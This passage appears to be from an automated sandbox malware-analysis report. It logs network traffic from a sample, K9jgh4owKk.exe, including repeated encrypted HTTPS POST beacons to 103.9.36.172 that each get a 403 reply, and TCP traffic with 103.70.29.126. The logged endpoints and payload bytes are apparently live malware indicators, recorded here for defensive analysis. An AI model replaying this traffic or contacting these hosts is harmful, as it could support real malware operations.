Dec 31, 2021 09:54:15.211780071 CET	49935	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:15.217477083 CET	49935	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:15.217624903 CET	49935	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:15.415946960 CET	593	49935	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:15.423054934 CET	593	49935	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:15.423103094 CET	593	49935	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:15.423140049 CET	593	49935	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:15.891031027 CET	593	49935	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:15.891113043 CET	593	49935	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:15.891350031 CET	49935	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:15.895370007 CET	49935	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:16.099802017 CET	593	49935	103.70.29.126	192.168.2.7

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 31, 2021 09:52:16.781984091 CET	8.8.8.8	192.168.2.7	0x4ffb	No error (0)	windowsupdate.s.llnwi.net		178.79.225.128	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

103.9.36.172

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49757	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:52:15 UTC	0	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:52:15 UTC	0	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:52:15 UTC	4	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:51:19 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49761	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:52:19 UTC	4	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:52:19 UTC	5	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:52:20 UTC	9	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:51:23 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.7	49796	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:52:50 UTC	49	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:52:50 UTC	49	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:52:51 UTC	54	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:51:55 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.7	49799	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:52:54 UTC	54	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:52:54 UTC	54	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:52:54 UTC	59	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:51:58 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.7	49804	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:52:57 UTC	59	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:52:57 UTC	59	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:52:58 UTC	64	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:01 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.7	49808	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:00 UTC	64	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:00 UTC	64	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:53:01 UTC	69	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:04 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.7	49813	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:04 UTC	69	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:04 UTC	69	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:53:05 UTC	74	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:08 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.7	49817	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:07 UTC	74	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:07 UTC	74	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:53:08 UTC	79	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:11 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.7	49825	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:10 UTC	79	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:10 UTC	79	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:53:11 UTC	84	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:14 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.7	49828	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:13 UTC	84	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:13 UTC	84	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:53:14 UTC	89	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:17 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.7	49841	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:16 UTC	89	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:16 UTC	89	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:53:17 UTC	94	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:20 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.7	49862	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:19 UTC	94	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:19 UTC	94	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:53:20 UTC	99	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:23 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49768	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:52:22 UTC	9	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:52:22 UTC	10	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:52:23 UTC	14	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:51:27 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.7	49871	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:22 UTC	99	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:22 UTC	99	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
